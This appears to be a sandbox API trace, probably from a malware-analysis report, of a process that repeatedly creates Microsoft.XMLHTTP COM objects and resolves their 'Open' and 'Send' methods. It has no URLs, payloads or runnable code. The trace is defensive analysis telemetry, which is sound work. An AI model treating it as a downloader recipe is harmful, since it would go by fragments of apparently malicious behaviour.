	[0247.347] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0247.348] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0247.348] SysStringLen (param_1=0x0) returned 0x0
	[0247.348] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0247.349] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0247.349] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0247.349] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0247.349] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0247.349] ??2@YAPEAX_K@Z () returned 0x62f330
	[0247.349] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f330) 
	[0247.349] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0247.349] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0247.349] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0247.349] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0247.349] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0247.349] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0247.352] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0247.352] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0247.352] SysStringLen (param_1=0x0) returned 0x0
	[0247.352] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0247.352] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0247.352] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0247.352] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0247.352] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0247.352] ??2@YAPEAX_K@Z () returned 0x62f310
	[0247.352] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f310) 
	[0247.352] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0247.352] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0247.352] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0247.352] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0247.353] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0247.353] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0247.353] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0247.353] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0247.353] SysStringLen (param_1=0x0) returned 0x0
	[0247.353] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0247.353] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0247.353] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0247.353] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0247.353] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0247.353] ??2@YAPEAX_K@Z () returned 0x62f330
	[0247.353] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0247.353] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0247.353] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0247.353] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0247.353] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0247.353] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0247.353] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0247.353] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0247.354] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0247.354] SysStringLen (param_1=0x0) returned 0x0
	[0247.354] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0247.354] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0247.354] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0247.354] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0247.354] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0247.354] ??2@YAPEAX_K@Z () returned 0x62f310
	[0247.354] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f310) 
	[0247.354] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0247.354] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0247.354] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0247.354] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0247.354] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0247.354] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0247.354] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0247.354] longjmp () 
	[0247.354] longjmp () 
	[0247.354] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0247.354] SysStringLen (param_1=0x0) returned 0x0
	[0247.354] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0247.354] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0247.354] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0247.354] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0247.355] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0247.355] ??2@YAPEAX_K@Z () returned 0x62f330
	[0247.355] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0247.355] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0247.355] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0247.355] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0247.355] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0247.355] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0247.355] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0247.355] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0247.355] longjmp () 
	[0247.355] longjmp () 
	[0247.355] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0247.355] SysStringLen (param_1=0x0) returned 0x0
	[0247.355] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0247.355] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0247.355] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0247.355] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0247.355] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c68) returned 0x0
	[0247.355] ??2@YAPEAX_K@Z () returned 0x62f310
	[0247.355] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c68, pUnkSite=0x62f310) 
	[0247.355] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0247.355] XMLHTTPRequest:IUnknown:Release (This=0x49c5c68) returned 0x0
	[0247.355] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0247.356] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0247.356] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0247.356] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0247.356] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0247.356] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0247.356] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
